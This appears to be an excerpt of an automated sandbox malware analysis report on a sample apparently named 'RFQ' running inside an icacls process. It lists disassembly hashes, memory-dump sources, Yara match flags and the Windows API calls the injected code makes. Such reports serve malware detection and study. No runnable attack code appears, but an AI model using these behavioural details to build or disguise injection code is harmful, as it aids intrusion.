                                                                                                        • Opcode Fuzzy Hash: eb82c59cab4ae9aa5e9f3bdb838203361aeda6ddd55d623ca2127bc23a492004
                                                                                                        • Instruction Fuzzy Hash: 7D90026134140442D10071584454B069006D7E1301F96C015E1064558DCA1DCD526226
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d22236e8cf5b35053a5470570ec9381d70ea9856743648fa97b903ec9a36be15
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 5e3cd32e2883f3e781b0b95687b25a561a15e9367f7e86953c62e4069d6db0b6
                                                                                                        • Instruction ID: 7c21d6822d236131b9913913ef5a0dfbf250e4b4edfd2c9a628b0870a7658dca
                                                                                                        • Opcode Fuzzy Hash: 5e3cd32e2883f3e781b0b95687b25a561a15e9367f7e86953c62e4069d6db0b6
                                                                                                        • Instruction Fuzzy Hash: 7951B7B5A00117BFDB11DBAD8D90A7EFBF8BB48240B54816AE495D7641D334DF44CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 7cc57e52cd0284592ea7fc573caac9c536cfb870ac1c709cb341b4a91e75aa74
                                                                                                        • Instruction ID: 5cb726c11dac4c1db8f912808bc8ff33a3e805fb2fe0567d806c93f9a428626d
                                                                                                        • Opcode Fuzzy Hash: 7cc57e52cd0284592ea7fc573caac9c536cfb870ac1c709cb341b4a91e75aa74
                                                                                                        • Instruction Fuzzy Hash: 6351E671A00645AEDF35DF6CCA94A7EB7FCEF48300B04846AE596D7642D6B8EA408770
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01AA4742
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01AA4787
                                                                                                        • ExecuteOptions, xrefs: 01AA46A0
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01AA4725
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01AA4655
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01AA46FC
                                                                                                        • Execute=1, xrefs: 01AA4713
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: ac44a5223d726df1e72995eb1a31bc55c7e9c4c9abe11eb472ef77a76b056c8d
                                                                                                        • Instruction ID: 43a3ad6897486dfd38d4388aa1192d99df8d7a39edcd60d5b5f66365a95418c9
                                                                                                        • Opcode Fuzzy Hash: ac44a5223d726df1e72995eb1a31bc55c7e9c4c9abe11eb472ef77a76b056c8d
                                                                                                        • Instruction Fuzzy Hash: 42513A356102197AEF21ABE9DD85FBE77BCEF18308F4800A9E605A7181E7709E458F50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                        • API String ID: 48624451-2819853543
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01AA02E7
                                                                                                        • RTL: Re-Waiting, xrefs: 01AA031E
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01AA02BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 01AA7B8E
                                                                                                        • RTL: Re-Waiting, xrefs: 01AA7BAC
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01AA7B7F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AA728C
                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 01AA72A3
                                                                                                        • RTL: Re-Waiting, xrefs: 01AA72C1
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01AA7294
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$]:%u
                                                                                                        • API String ID: 48624451-3050659472
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.6%
                                                                                                        Dynamic/Decrypted Code Coverage:3.9%
                                                                                                        Signature Coverage:2%
                                                                                                        Total number of Nodes:492
                                                                                                        Total number of Limit Nodes:78
30e37b0 NtClose 96751->96752 96755 30e0498 96752->96755 96753 30e04c6 96754 30e91e0 RtlFreeHeap 96753->96754 96756 30e04d2 96754->96756 96755->96753 96757 30e0503 96755->96757 96759 30e0508 96755->96759 96758 30e91e0 RtlFreeHeap 96757->96758 96758->96759

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #$%y$'f$)$5-$>;$?m$KV$ND$UZ$c%$d$eZ$gv$l$n1$q$u$vR$w$$w%$wX$~b
                                                                                                        • API String ID: 0-185663158
                                                                                                        • Opcode ID: 93f1c7ec38ffda38eba93e3ac0d585a937fcea73f87ff4ca52344262cf58ff0b
                                                                                                        • Instruction ID: 4d7a2492498a1ec7931e780554dc5796d6764aa36fbfe526b9cefd3cd8b79673
                                                                                                        • Opcode Fuzzy Hash: 93f1c7ec38ffda38eba93e3ac0d585a937fcea73f87ff4ca52344262cf58ff0b
                                                                                                        • Instruction Fuzzy Hash: 2722B0B0D16268CBEB64CF85C994BDDBBB2BF45308F1081D9C0496B294DBB95A88CF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 030DB211
                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 030DB24E
                                                                                                        • FindClose.KERNELBASE(?), ref: 030DB259
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 3541575487-0
                                                                                                        • Opcode ID: 917f2ba48a8a32ea97d9baf93e7898b9139e8d856c35dc3dd7a89657b3fad8e9
                                                                                                        • Instruction ID: 4a641a73a5e39eebf20ebe090ee4ceadfad75467b550fb2e84d734f8f39d0c47
                                                                                                        • Opcode Fuzzy Hash: 917f2ba48a8a32ea97d9baf93e7898b9139e8d856c35dc3dd7a89657b3fad8e9
                                                                                                        • Instruction Fuzzy Hash: 0A3132B69013487FDB64DBA4CC85FFF77BC9B84705F144558B918AB180EB70AA848BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 030E7116
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 8ff75ae15b831dec616d4ac597ad7e6ff3b0f25627c392ce083e0cb91ea6115d
                                                                                                        • Instruction ID: 4e34a6dc2642f4047e52cd261245a83bc58c856dee64636b336538f051be9d98
                                                                                                        • Opcode Fuzzy Hash: 8ff75ae15b831dec616d4ac597ad7e6ff3b0f25627c392ce083e0cb91ea6115d
                                                                                                        • Instruction Fuzzy Hash: 7931F7B5A11209AFCB14DF98D880EEFB7F9EF8C714F108619F918A7340D770A9518BA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 030E725B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: 3b0e1b33901340b62b842e721e70fcf5a93d54b836b9d68e69a6224c9af8e663
                                                                                                        • Instruction ID: 7c7a2ed69582fdcd1a464ccca6f7568dfcbc553d012db7ce7af0e20eda2aa852
                                                                                                        • Opcode Fuzzy Hash: 3b0e1b33901340b62b842e721e70fcf5a93d54b836b9d68e69a6224c9af8e663
                                                                                                        • Instruction Fuzzy Hash: 7C311AB5A01209AFDB14DF98D840EEFB7B9EF8C714F008609FD18A7280D774A911CBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(030D0D3B,?,030E6087,00000000,00000004,00003000,?,?,?,?,?,030E6087,030D0D3B,030DFAC1,030E6087,00000000), ref: 030E7520
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: 89f6f36a3592fc282b6a1e3404c1c74815f73935c7ab195cab08ff1d03aa4076
                                                                                                        • Instruction ID: 4fb96476e2779ecd19fc1bb79cc99e6be423d22056ebccd3b8bd8f2075e0d2a1
                                                                                                        • Opcode Fuzzy Hash: 89f6f36a3592fc282b6a1e3404c1c74815f73935c7ab195cab08ff1d03aa4076
                                                                                                        • Instruction Fuzzy Hash: E1211BB5A11209AFDB14DF68DC41FEFB7A9EF88710F408509FD18A7280D774A911CBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 4033686569-0
                                                                                                        • Opcode ID: 67eeb970bbe66605b47678012e99ad5774d6d00bc3ed42f123f448935b982610
                                                                                                        • Instruction ID: d5e1c604d9d3ae9abe3076f2fa3126e6661b76a8cf55ad08d3b163ffdbd91ad3
                                                                                                        • Opcode Fuzzy Hash: 67eeb970bbe66605b47678012e99ad5774d6d00bc3ed42f123f448935b982610
                                                                                                        • Instruction Fuzzy Hash: D5015E79A513187FE624EAA8DC45FEB73ACDFC5610F404549FA186B180DBB0650087E5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,?,00000000,030D2538,?,030E012D,030D2538,494CA64B,?,?,?,?,?,?,030E3826), ref: 030E7347
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 8992f114be1ba2a05a1850425414e7bbbe9c44187a3c2aaee730293ab117c9aa
                                                                                                        • Instruction ID: 3356b09abb5187f384142a04ef21d0fe829489bc38be843426acfd54f8ee8f0a
                                                                                                        • Opcode Fuzzy Hash: 8992f114be1ba2a05a1850425414e7bbbe9c44187a3c2aaee730293ab117c9aa
                                                                                                        • Instruction Fuzzy Hash: C4E04F356003047BD510EB69DC41FDB776CDFC5B11F004519FA08AB181CAB0B91086F5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 168ae7cc502e30552526a52d88b81f06d972a528c581d4ba35cc85c368027ae3
                                                                                                        • Instruction ID: 09cee1785f8ccc885a368b47ae4388bfc4f577d9844792e00ab7e393f50eca3b
                                                                                                        • Opcode Fuzzy Hash: 168ae7cc502e30552526a52d88b81f06d972a528c581d4ba35cc85c368027ae3
                                                                                                        • Instruction Fuzzy Hash: E290027560990412A140B1584888546405997E1301B55C011F042C554C8B148A5A6361
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 47d32cb0defc8f01772113a8c07586571ec000855250ee86b666db927b57e8dd
                                                                                                        • Instruction ID: b3495f9c2f4ed5902475f6a0b97b154706e0879e85bae3f2c93e0f027a0f1a5e
                                                                                                        • Opcode Fuzzy Hash: 47d32cb0defc8f01772113a8c07586571ec000855250ee86b666db927b57e8dd
                                                                                                        • Instruction Fuzzy Hash: 419002A5605604425140B1584808406605997E2301395C115B055C560C87188959A269
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 0e707f0c2e6b059b22f8b6d5687c986b7b5c123c789b2644a2854dfa5eaf9a88
                                                                                                        • Instruction ID: c62654c3f01e711269a331ff6c2bc742ed1dbbe27b03734b0486581a6b60f8af
                                                                                                        • Opcode Fuzzy Hash: 0e707f0c2e6b059b22f8b6d5687c986b7b5c123c789b2644a2854dfa5eaf9a88
                                                                                                        • Instruction Fuzzy Hash: 8290027560950C02E150B1584418746005987D1301F55C011B002C654D87558B5976A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: c54a742fc73fb7066cf6821aeb1eb15da74465c48cd18725a9bbb27cddf0f14d
                                                                                                        • Instruction ID: 76aef941f98af5bd60b2524110f68c15579a70b46ee86c76d3757e95413e9f18
                                                                                                        • Opcode Fuzzy Hash: c54a742fc73fb7066cf6821aeb1eb15da74465c48cd18725a9bbb27cddf0f14d
                                                                                                        • Instruction Fuzzy Hash: FE90027520550C02E180B158440864A005987D2301F95C015B002D654DCB158B5D77A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 2dd4d6cd6a1b10d3d1a7b81ad6617f171221497fd37c9dc43f7375a782da1340
                                                                                                        • Instruction ID: 0e340211fb13060d6b9410810eccb0f730447b66325ce97ec8456e2dba413f93
                                                                                                        • Opcode Fuzzy Hash: 2dd4d6cd6a1b10d3d1a7b81ad6617f171221497fd37c9dc43f7375a782da1340
                                                                                                        • Instruction Fuzzy Hash: BA90027520954C42E140B1584408A46006987D1305F55C011B006C694D97258E59B661
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: d5afe4b9df5b23df10ee4894e9db889721689e3eeaf55659ebd1d82a524b3487
                                                                                                        • Instruction ID: 0ecc10c72318d5352bb41bb8929244413391cc637bc4d5c1739f335882bb7942
                                                                                                        • Opcode Fuzzy Hash: d5afe4b9df5b23df10ee4894e9db889721689e3eeaf55659ebd1d82a524b3487
                                                                                                        • Instruction Fuzzy Hash: B59002A5206504035105B1584418616405E87E1201B55C021F101C590DC62589957125
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 9a7a023e102e55d42e0546a1e211594f6fc613ceb7da60b3eb7d3af70d72b96f
                                                                                                        • Instruction ID: 31b23b41098db73c19f358371cf3faa808d19542fd317a335213742f25374808
                                                                                                        • Opcode Fuzzy Hash: 9a7a023e102e55d42e0546a1e211594f6fc613ceb7da60b3eb7d3af70d72b96f
                                                                                                        • Instruction Fuzzy Hash: 41900269215504031105F5580708507009A87D6351355C021F101D550CD72189656121
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
